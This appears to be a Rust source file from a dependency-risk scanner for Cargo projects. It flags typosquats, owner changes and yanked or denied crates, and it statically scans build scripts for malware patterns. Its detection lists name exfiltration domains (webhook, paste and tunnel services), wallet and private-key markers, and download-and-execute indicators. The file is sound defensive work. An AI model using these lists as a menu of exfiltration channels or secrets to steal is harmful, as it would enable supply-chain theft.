1use crate::errors::RustinelError;
2use crate::lockfile::{LockfileModel, Package};
3use crate::AnalysisOptions;
4use serde::{Deserialize, Serialize};
5use std::path::{Path, PathBuf};
6
7#[derive(Debug, Clone, Serialize, Deserialize)]
8pub struct Evidence {
9 pub kind: String,
10 #[serde(skip_serializing_if = "Option::is_none")]
11 pub path: Option<String>,
12 pub summary: String,
13}
14
15impl Evidence {
16 pub fn new(kind: &str, summary: impl Into<String>) -> Self {
17 Self {
18 kind: kind.into(),
19 path: None,
20 summary: summary.into(),
21 }
22 }
23
24 pub fn with_path(kind: &str, path: impl Into<String>, summary: impl Into<String>) -> Self {
25 Self {
26 kind: kind.into(),
27 path: Some(path.into()),
28 summary: summary.into(),
29 }
30 }
31}
32
33#[derive(Debug, Clone, Serialize, Deserialize)]
34pub struct RiskSignal {
35 pub id: String,
36 pub package: String,
37 pub severity: Severity,
38 pub weight: u8,
39 pub confidence: f32,
40 pub evidence: Vec<Evidence>,
41 pub recommendation: String,
42}
43
44#[derive(Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq, PartialOrd, Ord)]
45#[serde(rename_all = "snake_case")]
46pub enum Severity {
47 Info,
48 Low,
49 Medium,
50 High,
51 Critical,
52}
53
54impl Severity {
55 pub fn as_str(&self) -> &'static str {
56 match self {
57 Severity::Info => "info",
58 Severity::Low => "low",
59 Severity::Medium => "medium",
60 Severity::High => "high",
61 Severity::Critical => "critical",
62 }
63 }
64}
65
66pub fn collect_basic_signals(
71 lock: &LockfileModel,
72 options: &AnalysisOptions,
73) -> Result<Vec<RiskSignal>, RustinelError> {
74 let mut signals = Vec::new();
75
76 collect_multiple_versions(lock, &mut signals);
77 collect_name_heuristics(lock, &mut signals);
78 collect_typosquat(lock, options, &mut signals);
79 collect_source_substitution(lock, &mut signals);
80 collect_freshness(lock, options, &mut signals);
81 collect_owners_changed(lock, options, &mut signals);
82 collect_yanked(lock, options, &mut signals);
83 collect_denied(lock, options, &mut signals);
84
85 if let Some(source_root) = options.source_root() {
86 collect_source_signals(lock, &source_root, &mut signals)?;
87 }
88
89 apply_known_good_baseline(&mut signals);
90 annotate_dependency_paths(lock, &mut signals);
91 sort_signals(&mut signals);
92 Ok(signals)
93}
94
95fn annotate_dependency_paths(lock: &LockfileModel, signals: &mut [RiskSignal]) {
99 let paths = crate::graph::dependency_paths(lock);
100 for signal in signals.iter_mut() {
101 if signal.severity <= Severity::Info {
102 continue;
103 }
104 let name = signal.package.split('@').next().unwrap_or(&signal.package);
105 if let Some(path) = paths.get(name) {
106 if path.len() >= 2 {
107 signal.evidence.push(Evidence::new(
108 "path",
109 format!("pulled in via: {}", crate::graph::format_path(path)),
110 ));
111 }
112 }
113 }
114}
115
116fn collect_owners_changed(
122 lock: &LockfileModel,
123 options: &AnalysisOptions,
124 signals: &mut Vec<RiskSignal>,
125) {
126 if options.trusted_owners.is_empty() {
127 return;
128 }
129 let mut done = std::collections::BTreeSet::new();
130 for package in lock.registry_packages() {
131 if !package.id.is_crates_io() {
134 continue;
135 }
136 let name = package.id.name.as_str();
137 if done.contains(name) {
141 continue;
142 }
143 let Some(trusted) = options.trusted_owners.get(name) else {
144 continue;
145 };
146 let Some(meta) = options.metadata.get(&package.id.to_string()) else {
147 continue;
148 };
149 if meta.owners.is_empty() {
150 continue;
151 }
152 done.insert(name.to_string());
153 let current: std::collections::BTreeSet<&str> =
154 meta.owners.iter().map(String::as_str).collect();
155 let baseline: std::collections::BTreeSet<&str> =
156 trusted.iter().map(String::as_str).collect();
157 if current == baseline {
158 continue;
159 }
160 let added: Vec<&str> = current.difference(&baseline).copied().collect();
161 let removed: Vec<&str> = baseline.difference(¤t).copied().collect();
162 let mut parts = Vec::new();
163 if !added.is_empty() {
164 parts.push(format!("new owner(s): {}", added.join(", ")));
165 }
166 if !removed.is_empty() {
167 parts.push(format!("removed owner(s): {}", removed.join(", ")));
168 }
169 signals.push(RiskSignal {
170 id: "owners_changed".into(),
171 package: package.id.to_string(),
172 severity: Severity::Medium,
173 weight: 20,
174 confidence: 1.0,
175 evidence: vec![Evidence::new(
176 "registry",
177 format!(
178 "crates.io owners changed since trusted ({}) — a new maintainer is the supply-chain takeover vector (xz, event-stream)",
179 parts.join("; ")
180 ),
181 )],
182 recommendation:
183 "Verify the ownership change is legitimate, then refresh the baseline with `cargo rustinel trust`."
184 .into(),
185 });
186 }
187}
188
189fn collect_source_substitution(lock: &LockfileModel, signals: &mut Vec<RiskSignal>) {
196 for package in lock.registry_packages() {
197 let name = package.id.name.as_str();
198 if !POPULAR_CRATES.contains(&name) {
199 continue;
200 }
201 if package.id.is_crates_io() {
202 continue;
203 }
204 let source = package.id.source.as_deref().unwrap_or("an unknown source");
205 signals.push(RiskSignal {
206 id: "source_substitution".into(),
207 package: package.id.to_string(),
208 severity: Severity::Medium,
209 weight: 18,
210 confidence: 0.7,
211 evidence: vec![Evidence::new(
212 "source",
213 format!(
214 "the popular crate `{name}` resolves from a non-crates.io source ({source}) — \
215 verify this is an intended fork or mirror, not a dependency-confusion substitution"
216 ),
217 )],
218 recommendation:
219 "Confirm why a well-known crate name comes from a non-crates.io source. If it is \
220 not an intentional patch, this is the dependency-confusion vector — pin the \
221 crates.io source."
222 .into(),
223 });
224 }
225}
226
227fn collect_yanked(lock: &LockfileModel, options: &AnalysisOptions, signals: &mut Vec<RiskSignal>) {
231 if options.yanked.is_empty() {
232 return;
233 }
234 for package in lock.registry_packages() {
235 if !package.id.is_crates_io() {
238 continue;
239 }
240 let id = package.id.to_string();
241 if options.yanked.contains(&id) {
242 signals.push(RiskSignal {
243 id: "yanked_crate".into(),
244 package: id,
245 severity: Severity::Medium,
246 weight: 25,
247 confidence: 1.0,
248 evidence: vec![Evidence::new(
249 "registry",
250 "this exact version has been yanked from the registry",
251 )],
252 recommendation: "Update to a non-yanked version, or replace this dependency."
253 .into(),
254 });
255 }
256 }
257}
258
259fn collect_denied(lock: &LockfileModel, options: &AnalysisOptions, signals: &mut Vec<RiskSignal>) {
265 let Some(policy) = &options.policy else {
266 return;
267 };
268 let Some(deny) = &policy.deny else {
269 return;
270 };
271 if deny.crates.is_empty() {
272 return;
273 }
274 for package in lock.registry_packages() {
275 if deny.crates.iter().any(|c| c == &package.id.name) {
276 signals.push(RiskSignal {
277 id: "denied_crate".into(),
278 package: package.id.to_string(),
279 severity: Severity::High,
280 weight: 0,
281 confidence: 1.0,
282 evidence: vec![Evidence::new(
283 "policy",
284 format!("`{}` is on the policy deny list", package.id.name),
285 )],
286 recommendation: "Remove this dependency, or remove it from the policy deny list."
287 .into(),
288 });
289 }
290 }
291}
292
293pub fn sort_signals(signals: &mut [RiskSignal]) {
296 signals.sort_by(|a, b| {
297 b.severity
298 .cmp(&a.severity)
299 .then_with(|| a.id.cmp(&b.id))
300 .then_with(|| a.package.cmp(&b.package))
301 });
302}
303
304fn collect_multiple_versions(lock: &LockfileModel, signals: &mut Vec<RiskSignal>) {
305 for (name, packages) in lock.by_name() {
306 let registry: Vec<&&Package> = packages.iter().filter(|p| !p.id.is_local()).collect();
308 if registry.len() > 1 {
309 for package in ®istry {
310 signals.push(RiskSignal {
311 id: "multiple_versions_same_crate".into(),
312 package: package.id.to_string(),
313 severity: Severity::Low,
314 weight: 3,
315 confidence: 1.0,
316 evidence: vec![Evidence::with_path(
317 "lockfile",
318 lock.path.display().to_string(),
319 format!(
320 "{} distinct versions of `{name}` are present",
321 registry.len()
322 ),
323 )],
324 recommendation: "Consider deduplicating dependency versions where feasible."
325 .into(),
326 });
327 }
328 }
329 }
330}
331
332fn collect_name_heuristics(lock: &LockfileModel, signals: &mut Vec<RiskSignal>) {
333 for package in lock.registry_packages() {
334 if package.id.name.ends_with("-sys") {
335 signals.push(RiskSignal {
339 id: "native_ffi_detected".into(),
340 package: package.id.to_string(),
341 severity: Severity::Low,
342 weight: 8,
343 confidence: 0.6,
344 evidence: vec![Evidence::new(
345 "heuristic",
346 "crate name ends with `-sys`, a convention for native/FFI bindings",
347 )],
348 recommendation:
349 "Review the native dependency and its build process before merging.".into(),
350 });
351 }
352 }
353}
354
355pub const POPULAR_CRATES: &[&str] = &[
359 "serde",
360 "serde_json",
361 "serde_derive",
362 "tokio",
363 "tokio-util",
364 "reqwest",
365 "hyper",
366 "rand",
367 "regex",
368 "syn",
369 "quote",
370 "proc-macro2",
371 "libc",
372 "log",
373 "env_logger",
374 "tracing",
375 "tracing-subscriber",
376 "anyhow",
377 "thiserror",
378 "clap",
379 "futures",
380 "bytes",
381 "chrono",
382 "time",
383 "uuid",
384 "itertools",
385 "rayon",
386 "crossbeam",
387 "parking_lot",
388 "once_cell",
389 "lazy_static",
390 "base64",
391 "hex",
392 "sha2",
393 "sha1",
394 "md5",
395 "digest",
396 "hmac",
397 "aes",
398 "mime",
403 "md-5",
404 "anes",
405 "rustls",
406 "ring",
407 "openssl",
408 "openssl-sys",
409 "native-tls",
410 "url",
411 "http",
412 "h2",
413 "mio",
414 "socket2",
415 "num",
416 "num-traits",
417 "num-bigint",
418 "bitflags",
419 "cfg-if",
420 "memchr",
421 "smallvec",
422 "indexmap",
423 "hashbrown",
424 "ahash",
425 "toml",
426 "serde_yaml",
427 "csv",
428 "flate2",
429 "zip",
430 "tar",
431 "walkdir",
432 "tempfile",
433 "dirs",
434 "which",
435 "semver",
436 "git2",
437 "nix",
438 "winapi",
439 "windows-sys",
440 "async-trait",
441 "async-std",
442 "actix-web",
443 "axum",
444 "tower",
445 "diesel",
446 "sqlx",
447 "redis",
448 "mongodb",
449 "prost",
450 "tonic",
451 "serde_urlencoded",
452 "percent-encoding",
453 "idna",
454 "unicode-normalization",
455 "getrandom",
456 "rand_core",
457 "crc32fast",
458 "miniz_oxide",
459 "backtrace",
460 "addr2line",
461 "object",
462 "gimli",
463 "wasm-bindgen",
464 "js-sys",
465 "web-sys",
466 "tokio-stream",
468 "tower-http",
469 "tonic-build",
470 "tungstenite",
471 "tokio-tungstenite",
472 "reqwest-middleware",
473 "hyper-tls",
474 "hyper-util",
475 "rustls-pemfile",
476 "webpki-roots",
477 "trust-dns-resolver",
478 "warp",
479 "rocket",
480 "actix",
481 "actix-rt",
482 "async-channel",
483 "futures-util",
484 "futures-core",
485 "pin-project",
486 "pin-project-lite",
487 "bincode",
489 "rmp-serde",
490 "postcard",
491 "serde_with",
492 "serde_repr",
493 "toml_edit",
494 "ron",
495 "quick-xml",
496 "roxmltree",
497 "prost-build",
498 "protobuf",
499 "arrow",
500 "polars",
501 "clap_derive",
503 "clap_complete",
504 "structopt",
505 "argh",
506 "console",
507 "indicatif",
508 "dialoguer",
509 "color-eyre",
510 "eyre",
511 "miette",
512 "config",
513 "dotenvy",
514 "directories",
515 "blake3",
517 "blake2",
518 "sha3",
519 "ed25519-dalek",
520 "curve25519-dalek",
521 "x25519-dalek",
522 "rsa",
523 "chacha20poly1305",
524 "argon2",
525 "bcrypt",
526 "subtle",
527 "zeroize",
528 "rand_chacha",
529 "time-macros",
531 "humantime",
532 "bigdecimal",
533 "rust_decimal",
534 "ordered-float",
535 "unicode-width",
536 "unicode-segmentation",
537 "aho-corasick",
538 "regex-syntax",
539 "fancy-regex",
540 "nom",
541 "pest",
542 "logos",
543 "async-stream",
545 "dashmap",
546 "flume",
547 "arc-swap",
548 "thread_local",
549 "num_cpus",
550 "rayon-core",
551 "crossbeam-channel",
552 "crossbeam-utils",
553 "sea-orm",
555 "rusqlite",
556 "deadpool",
557 "r2d2",
558 "sled",
559 "rocksdb",
560 "proptest",
562 "quickcheck",
563 "mockall",
564 "insta",
565 "criterion",
566 "trybuild",
567 "paste",
568 "strum",
569 "derive_more",
570 "darling",
571];
572
573const TYPOSQUAT_TRUST_DOWNLOADS: u64 = 10_000;
582
583fn collect_typosquat(
584 lock: &LockfileModel,
585 options: &AnalysisOptions,
586 signals: &mut Vec<RiskSignal>,
587) {
588 for package in lock.registry_packages() {
589 let name = package.id.name.as_str();
590 if POPULAR_CRATES.contains(&name) || is_known_good(name) {
591 continue;
592 }
593 if name.len() < 4 {
595 continue;
596 }
597 let Some(target) = nearest_popular(name) else {
598 continue;
599 };
600 let downloads = options
606 .metadata
607 .get(&package.id.to_string())
608 .and_then(|m| m.total_downloads);
609 let base =
610 format!("crate name `{name}` is one edit away from the popular crate `{target}`");
611 let signal = match downloads {
612 Some(d) if d >= TYPOSQUAT_TRUST_DOWNLOADS => continue,
614 Some(d) => RiskSignal {
616 id: "possible_typosquat".into(),
617 package: package.id.to_string(),
618 severity: Severity::Medium,
619 weight: 18,
620 confidence: 0.85,
621 evidence: vec![Evidence::new(
622 "heuristic",
623 format!("{base}, and has only {d} downloads — likely typosquat / impersonation"),
624 )],
625 recommendation:
626 "Verify the publisher and source; this is very likely not the crate you intended."
627 .into(),
628 },
629 None => RiskSignal {
631 id: "possible_typosquat".into(),
632 package: package.id.to_string(),
633 severity: Severity::Info,
634 weight: 0,
635 confidence: 0.3,
636 evidence: vec![Evidence::new(
637 "heuristic",
638 format!("{base} — trust unverified offline (re-run with --online-metadata)"),
639 )],
640 recommendation:
641 "Run with --online-metadata to corroborate against download counts before acting."
642 .into(),
643 },
644 };
645 signals.push(signal);
646 }
647}
648
649const FRESH_DAYS: u64 = 14;
653
654fn collect_freshness(
659 lock: &LockfileModel,
660 options: &AnalysisOptions,
661 signals: &mut Vec<RiskSignal>,
662) {
663 for package in lock.registry_packages() {
664 if !package.id.is_crates_io() {
667 continue;
668 }
669 let Some(meta) = options.metadata.get(&package.id.to_string()) else {
670 continue;
671 };
672 let Some(days) = meta.published_days_ago else {
673 continue;
674 };
675 if days > FRESH_DAYS {
676 continue;
677 }
678 signals.push(RiskSignal {
679 id: "freshly_published".into(),
680 package: package.id.to_string(),
681 severity: Severity::Low,
682 weight: 6,
683 confidence: 1.0,
684 evidence: vec![Evidence::new(
685 "registry",
686 format!(
687 "version published {days} day(s) ago — recently published code has had little time for review or for advisories to surface"
688 ),
689 )],
690 recommendation:
691 "Confirm this version bump is intended; freshly published versions are the window for supply-chain attacks."
692 .into(),
693 });
694 }
695}
696
697pub fn typosquat_target(name: &str) -> Option<&'static str> {
704 if POPULAR_CRATES.contains(&name) || is_known_good(name) || name.len() < 4 {
705 return None;
706 }
707 nearest_popular(name)
708}
709
710fn nearest_popular(name: &str) -> Option<&'static str> {
712 POPULAR_CRATES
713 .iter()
714 .copied()
715 .find(|p| *p != name && damerau_levenshtein(name, p) == 1)
716}
717
718pub(crate) fn damerau_levenshtein(a: &str, b: &str) -> usize {
721 let a = a.as_bytes();
722 let b = b.as_bytes();
723 let (n, m) = (a.len(), b.len());
724 if n == 0 {
725 return m;
726 }
727 if m == 0 {
728 return n;
729 }
730 let mut prev2: Vec<usize> = vec![0; m + 1];
731 let mut prev: Vec<usize> = (0..=m).collect();
732 let mut curr: Vec<usize> = vec![0; m + 1];
733 for i in 1..=n {
734 curr[0] = i;
735 for j in 1..=m {
736 let cost = if a[i - 1] == b[j - 1] { 0 } else { 1 };
737 let mut val = (prev[j] + 1).min(curr[j - 1] + 1).min(prev[j - 1] + cost);
738 if i > 1 && j > 1 && a[i - 1] == b[j - 2] && a[i - 2] == b[j - 1] {
739 val = val.min(prev2[j - 2] + 1); }
741 curr[j] = val;
742 }
743 std::mem::swap(&mut prev2, &mut prev);
744 std::mem::swap(&mut prev, &mut curr);
745 }
746 prev[m]
747}
748
749const BUILD_RS_NETWORK: &[&str] = &[
756 "reqwest",
757 "ureq",
758 "hyper",
759 "isahc",
760 "curl",
761 "TcpStream",
762 "std::net",
763 "minreq",
764 "attohttpc",
765 "tokio::net",
766];
767const BUILD_RS_PAYLOAD: &[&str] = &[
768 "include_bytes!",
769 "base64::decode",
770 "STANDARD.decode",
771 "from_base64",
772 "hex::decode",
773 "libloading::",
774 "dlopen(",
777];
778
779const SECRET_MARKERS: &[&str] = &[
784 "base58",
785 "Base58",
786 "private_key",
787 "private key",
788 "PRIVATE KEY",
789 "keypair",
790 "secp256k1",
791 "mnemonic",
792 "seed phrase",
793 "solana",
794 "Solana",
795 "ethereum",
796 "Ethereum",
797 "wallet",
798 "ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijk",
802 "[0-9a-fA-F]{64}",
803];
804const SOURCE_SCAN: &[&str] = &[
807 "read_dir",
808 "WalkDir",
809 "walkdir",
810 "read_to_string",
811 "fs::read",
812];
813
814const EXFIL_HOST_DOMAINS: &[&str] = &[
824 ".workers.dev",
825 "pastebin.com",
826 "paste.ee",
827 "transfer.sh",
828 "0x0.st",
829 "anonfiles.com",
830 "webhook.site",
831 "requestbin",
832 "pipedream.net",
833 ".ngrok.io",
834 ".ngrok-free.app",
835];
836
837const DUAL_USE_EXFIL_DOMAINS: &[&str] = &[
843 "api.telegram.org",
844 "ip-api.com",
845 "discord.com/api/webhooks",
846 "discordapp.com/api/webhooks",
847];
848
849fn env_gated_block(content: &str) -> bool {
858 const WINDOW: usize = 25;
859 const ENV: &[&str] = &["env::var", "var_os"];
860 const SPAWN: &[&str] = &["Command::new", "process::Command", "libc::system"];
861 let lines: Vec<&str> = content.lines().collect();
862 for (i, line) in lines.iter().enumerate() {
863 if !BUILD_RS_NETWORK.iter().any(|m| line.contains(m)) {
864 continue;
865 }
866 let lo = i.saturating_sub(WINDOW);
867 let hi = (i + WINDOW + 1).min(lines.len());
868 let window = &lines[lo..hi];
869 let gated = window.iter().any(|l| ENV.iter().any(|m| l.contains(m)));
870 let spawns = window.iter().any(|l| SPAWN.iter().any(|m| l.contains(m)));
871 if gated && spawns {
872 return true;
873 }
874 }
875 false
876}
877
878#[derive(Default)]
879struct ExfilScan {
880 exfil_domain: Option<String>,
881 domain_sample: Option<PathBuf>,
884 env_gated_sample: Option<PathBuf>,
885 source_exfil_sample: Option<PathBuf>,
890 source_exfil_network: bool,
891 source_exfil_secrets: bool,
892}
893
894impl ExfilScan {
895 fn any_match(&self) -> bool {
896 self.source_exfil_sample.is_some()
897 || self.domain_sample.is_some()
898 || self.env_gated_sample.is_some()
899 }
900}
901
902fn sorted_dir_entries(dir: &Path) -> Vec<std::fs::DirEntry> {
911 let Ok(rd) = std::fs::read_dir(dir) else {
912 return Vec::new();
913 };
914 let mut entries: Vec<_> = rd
922 .flatten()
923 .take(crate::safety::MAX_DIR_ENTRIES.saturating_add(1))
924 .collect();
925 entries.sort_by_key(|e| e.file_name());
926 entries
927}
928
929fn scan_source_exfil(crate_dir: &Path) -> Option<ExfilScan> {
932 use crate::safety::{MAX_DIR_DEPTH, MAX_DIR_ENTRIES, MAX_SOURCE_FILE_BYTES};
933 let mut found = ExfilScan::default();
934 let mut stack: Vec<(PathBuf, usize)> = if crate_dir.join("src").is_dir() {
935 vec![(crate_dir.join("src"), 0)]
936 } else {
937 vec![(crate_dir.to_path_buf(), 0)]
938 };
939 let mut visited = 0usize;
940 'walk: while let Some((dir, depth)) = stack.pop() {
941 for entry in sorted_dir_entries(&dir) {
942 if visited >= MAX_DIR_ENTRIES {
943 break 'walk;
946 }
947 visited += 1;
948 let Ok(ft) = entry.file_type() else { continue };
949 if ft.is_symlink() {
950 continue;
951 }
952 let path = entry.path();
953 if ft.is_dir() {
954 if depth < MAX_DIR_DEPTH {
955 stack.push((path, depth + 1));
956 }
957 continue;
958 }
959 if ft.is_file() && path.extension().and_then(|e| e.to_str()) == Some("rs") {
960 if let Some(c) = crate::safety::read_file_capped(&path, MAX_SOURCE_FILE_BYTES) {
961 let scans = c.contains("\".rs\"") && SOURCE_SCAN.iter().any(|m| c.contains(m));
962 let net = BUILD_RS_NETWORK.iter().any(|m| c.contains(m));
963 let sec = SECRET_MARKERS.iter().any(|m| c.contains(m));
964 let domain_here =
967 EXFIL_HOST_DOMAINS
968 .iter()
969 .find(|d| c.contains(**d))
970 .or_else(|| {
971 sec.then(|| DUAL_USE_EXFIL_DOMAINS.iter().find(|d| c.contains(**d)))
972 .flatten()
973 });
974 let env_gated = env_gated_block(&c);
979 if scans && (net || sec) && found.source_exfil_sample.is_none() {
984 found.source_exfil_sample = Some(path.clone());
985 found.source_exfil_network = net;
986 found.source_exfil_secrets = sec;
987 }
988 if let Some(d) = domain_here {
989 if found.exfil_domain.is_none() {
990 found.exfil_domain = Some((*d).to_string());
991 }
992 if found.domain_sample.is_none() {
993 found.domain_sample = Some(path.clone());
994 }
995 }
996 if env_gated && found.env_gated_sample.is_none() {
997 found.env_gated_sample = Some(path.clone());
998 }
999 }
1000 }
1001 }
1002 }
1003 found.any_match().then_some(found)
1004}
1005
1006fn source_exfil_signal(package: &str, network: bool, secrets: bool, path: String) -> RiskSignal {
1010 let mut what = Vec::new();
1011 if network {
1012 what.push("exfiltrates over the network");
1013 }
1014 if secrets {
1015 what.push("references wallet/private-key material");
1016 }
1017 RiskSignal {
1018 id: "suspicious_source_exfil".into(),
1019 package: package.to_string(),
1020 severity: Severity::High,
1021 weight: 26,
1022 confidence: 0.6,
1023 evidence: vec![
1024 Evidence::with_path(
1025 "source",
1026 path,
1027 "runtime source scans the project's `.rs` files (scanned statically, never executed)",
1028 ),
1029 Evidence::new(
1030 "heuristic",
1031 format!("…and {} — matches the faster_log/async_println crypto-stealer pattern", what.join(" and ")),
1032 ),
1033 ],
1034 recommendation:
1035 "A dependency that reads your source files and exfiltrates/handles secrets is almost \
1036 certainly malicious. Do not build it; report it to the registry."
1037 .into(),
1038 }
1039}
1040
1041fn exfil_domain_signal(package: &str, domain: &str, path: String) -> RiskSignal {
1048 RiskSignal {
1049 id: "suspicious_exfil_domain".into(),
1050 package: package.to_string(),
1051 severity: Severity::Medium,
1052 weight: 18,
1053 confidence: 0.5,
1054 evidence: vec![Evidence::with_path(
1055 "source",
1056 path,
1057 format!(
1058 "runtime source references `{domain}`, a domain class commonly used for data exfiltration (scanned statically, never executed)"
1059 ),
1060 )],
1061 recommendation:
1062 "Confirm why this dependency contacts that endpoint. Cloudflare Workers, Telegram, \
1063 IP-geolocation and paste/webhook services are common exfiltration channels — the \
1064 faster_log crypto-stealer (Sept 2025) shipped harvested keys to a `*.workers.dev` URL."
1065 .into(),
1066 }
1067}
1068
1069fn env_gated_payload_signal(package: &str, path: String) -> RiskSignal {
1074 RiskSignal {
1075 id: "env_gated_payload".into(),
1076 package: package.to_string(),
1077 severity: Severity::High,
1078 weight: 24,
1079 confidence: 0.5,
1080 evidence: vec![Evidence::with_path(
1081 "source",
1082 path,
1083 "runtime source reads an environment variable, makes a network request, and spawns a \
1084 process — the env-gated remote-payload pattern (scanned statically, never executed)",
1085 )],
1086 recommendation:
1087 "A dependency that gates a download-and-execute on an environment variable (e.g. a CI \
1088 flag) is the rustdecimal supply-chain pattern. Review this code before building; \
1089 report it if it is not yours."
1090 .into(),
1091 }
1092}
1093
1094pub(crate) fn build_script_intent_signal(
1096 package: &str,
1097 content: &str,
1098 path: String,
1099) -> Option<RiskSignal> {
1100 let net: Vec<&str> = BUILD_RS_NETWORK
1101 .iter()
1102 .copied()
1103 .filter(|m| content.contains(*m))
1104 .collect();
1105 let payload: Vec<&str> = BUILD_RS_PAYLOAD
1106 .iter()
1107 .copied()
1108 .filter(|m| content.contains(*m))
1109 .collect();
1110
1111 if net.is_empty() && payload.is_empty() {
1112 return None;
1113 }
1114
1115 let (severity, weight) = if !net.is_empty() {
1116 (Severity::High, 28)
1117 } else {
1118 (Severity::Medium, 16)
1119 };
1120
1121 let mut evidence = vec![Evidence::with_path(
1122 "source",
1123 path,
1124 "build.rs shows anomalous intent (scanned statically, never executed)",
1125 )];
1126 if !net.is_empty() {
1127 evidence.push(Evidence::new(
1128 "heuristic",
1129 format!("network access in build script: {}", net.join(", ")),
1130 ));
1131 }
1132 if !payload.is_empty() {
1133 evidence.push(Evidence::new(
1134 "heuristic",
1135 format!("embedded payload / dynamic loading: {}", payload.join(", ")),
1136 ));
1137 }
1138
1139 Some(RiskSignal {
1140 id: "build_script_suspicious".into(),
1141 package: package.to_string(),
1142 severity,
1143 weight,
1144 confidence: 0.8,
1145 evidence,
1146 recommendation:
1147 "A build script that reaches the network or unpacks an opaque payload is a known \
1148 malware vector. Manually review build.rs before building this crate."
1149 .into(),
1150 })
1151}
1152
1153pub const KNOWN_GOOD_CRATES: &[&str] = &[
1158 "libc",
1160 "windows-sys",
1161 "windows-targets",
1162 "windows_aarch64_gnullvm",
1163 "windows_aarch64_msvc",
1164 "windows_i686_gnu",
1165 "windows_i686_gnullvm",
1166 "windows_i686_msvc",
1167 "windows_x86_64_gnu",
1168 "windows_x86_64_gnullvm",
1169 "windows_x86_64_msvc",
1170 "linux-raw-sys",
1171 "core-foundation-sys",
1172 "errno",
1173 "js-sys",
1175 "web-sys",
1176 "wasm-bindgen",
1177 "wasm-bindgen-backend",
1178 "wasm-bindgen-shared",
1179 "bitflags",
1181 "cfg-if",
1182 "memchr",
1183 "once_cell",
1184 "smallvec",
1185 "rustix",
1186 "getrandom",
1187 "base62",
1190 "bhttp",
1191 "boml",
1192 "byte",
1193 "cfg-iif",
1194 "chttp",
1195 "clamp",
1196 "cmac",
1197 "coap",
1198 "cuid",
1199 "ehttp",
1200 "ghash",
1201 "httm",
1202 "http2",
1203 "hyper2",
1204 "hyperx",
1205 "hypher",
1206 "idea",
1207 "index-map",
1208 "iter_tools",
1209 "lhash",
1210 "lib0",
1211 "libm",
1212 "manyhow",
1213 "mise",
1214 "nbytes",
1215 "nuid",
1216 "objekt",
1217 "ohttp",
1218 "openssh",
1219 "pastel",
1220 "pastey",
1221 "pasts",
1222 "ping",
1223 "pmac",
1224 "rbase64",
1225 "rend",
1226 "rinf",
1227 "rlibc",
1228 "rustis",
1229 "rxing",
1230 "serde_json5",
1231 "serde_yaml2",
1232 "serde_yml",
1233 "sha-1",
1234 "shaq",
1235 "socket",
1236 "str0m",
1237 "tdigest",
1238 "temp-file",
1239 "tide",
1240 "timer",
1241 "tokio-utils",
1242 "tomlq",
1243 "uguid",
1244 "ulid",
1245 "utime",
1246 "uuid7",
1247];
1248
1249pub fn is_known_good(name: &str) -> bool {
1252 KNOWN_GOOD_CRATES.contains(&name)
1253}
1254
1255fn apply_known_good_baseline(signals: &mut [RiskSignal]) {
1258 for signal in signals.iter_mut() {
1259 if signal.id.starts_with("advisory_")
1267 || signal.id == "yanked_crate"
1268 || signal.id == "build_script_suspicious"
1269 || signal.id == "suspicious_source_exfil"
1270 || signal.id == "suspicious_exfil_domain"
1271 || signal.id == "env_gated_payload"
1272 || signal.id == "possible_typosquat"
1273 || signal.id == "owners_changed"
1274 || signal.id == "source_substitution"
1275 || signal.id == "denied_crate"
1276 {
1277 continue;
1278 }
1279 let name = signal.package.split('@').next().unwrap_or(&signal.package);
1280 if is_known_good(name) {
1281 signal.severity = Severity::Info;
1282 signal.weight = 0;
1283 signal.evidence.push(Evidence::new(
1284 "baseline",
1285 "crate is on the rustinel known-good baseline (ubiquitous platform/ecosystem crate); not counted toward risk",
1286 ));
1287 }
1288 }
1289}
1290
1291fn collect_source_signals(
1293 lock: &LockfileModel,
1294 source_root: &Path,
1295 signals: &mut Vec<RiskSignal>,
1296) -> Result<(), RustinelError> {
1297 for package in lock.registry_packages() {
1298 let Some(crate_dir) = locate_crate_dir(source_root, package) else {
1299 continue;
1300 };
1301
1302 let build_rs = crate_dir.join("build.rs");
1304 if build_rs.is_file() {
1305 signals.push(RiskSignal {
1306 id: "build_script_present".into(),
1307 package: package.id.to_string(),
1308 severity: Severity::Low,
1311 weight: 2,
1312 confidence: 0.95,
1313 evidence: vec![Evidence::with_path(
1314 "file",
1315 rel_display(source_root, &build_rs),
1316 "build.rs exists; the file was inspected statically and never executed",
1317 )],
1318 recommendation: "Review the build script before merging.".into(),
1319 });
1320
1321 if let Some(content) =
1326 crate::safety::read_file_capped(&build_rs, crate::safety::MAX_SOURCE_FILE_BYTES)
1327 {
1328 if let Some(sig) = build_script_intent_signal(
1329 &package.id.to_string(),
1330 &content,
1331 rel_display(source_root, &build_rs),
1332 ) {
1333 signals.push(sig);
1334 }
1335 }
1336 }
1337
1338 let manifest = crate_dir.join("Cargo.toml");
1340 if let Some(meta) = read_manifest(&manifest) {
1341 if let Some(links) = meta.links {
1342 if let Some(existing) = signals
1345 .iter_mut()
1346 .find(|s| s.id == "native_ffi_detected" && s.package == package.id.to_string())
1347 {
1348 existing.severity = Severity::Medium;
1349 existing.weight = 14;
1350 existing.confidence = 0.95;
1351 existing.evidence.push(Evidence::with_path(
1352 "manifest",
1353 rel_display(source_root, &manifest),
1354 format!("manifest declares `links = \"{links}\"`"),
1355 ));
1356 } else {
1357 signals.push(RiskSignal {
1358 id: "native_ffi_detected".into(),
1359 package: package.id.to_string(),
1360 severity: Severity::Medium,
1361 weight: 14,
1362 confidence: 0.9,
1363 evidence: vec![Evidence::with_path(
1364 "manifest",
1365 rel_display(source_root, &manifest),
1366 format!("manifest declares `links = \"{links}\"`"),
1367 )],
1368 recommendation:
1369 "Review the native dependency and its build process before merging."
1370 .into(),
1371 });
1372 }
1373 }
1374
1375 signals.push(license_signal(
1376 package,
1377 meta.license.as_deref(),
1378 &manifest,
1379 source_root,
1380 ));
1381 }
1382
1383 if let Some((stats, sample)) = count_unsafe(&crate_dir) {
1387 if stats.total > 0 {
1388 let (severity, weight) = if stats.total >= 20 {
1389 (Severity::Low, 3)
1390 } else {
1391 (Severity::Low, 1)
1392 };
1393 signals.push(RiskSignal {
1394 id: "unsafe_present".into(),
1395 package: package.id.to_string(),
1396 severity,
1397 weight,
1398 confidence: 0.8,
1399 evidence: vec![Evidence::with_path(
1400 "source",
1401 rel_display(source_root, &sample),
1402 format!(
1403 "{} `unsafe` usage(s) found by static scan (comments and strings ignored). \
1404 Use of `unsafe` is not automatically a vulnerability; it indicates code that warrants review.",
1405 stats.breakdown()
1406 ),
1407 )],
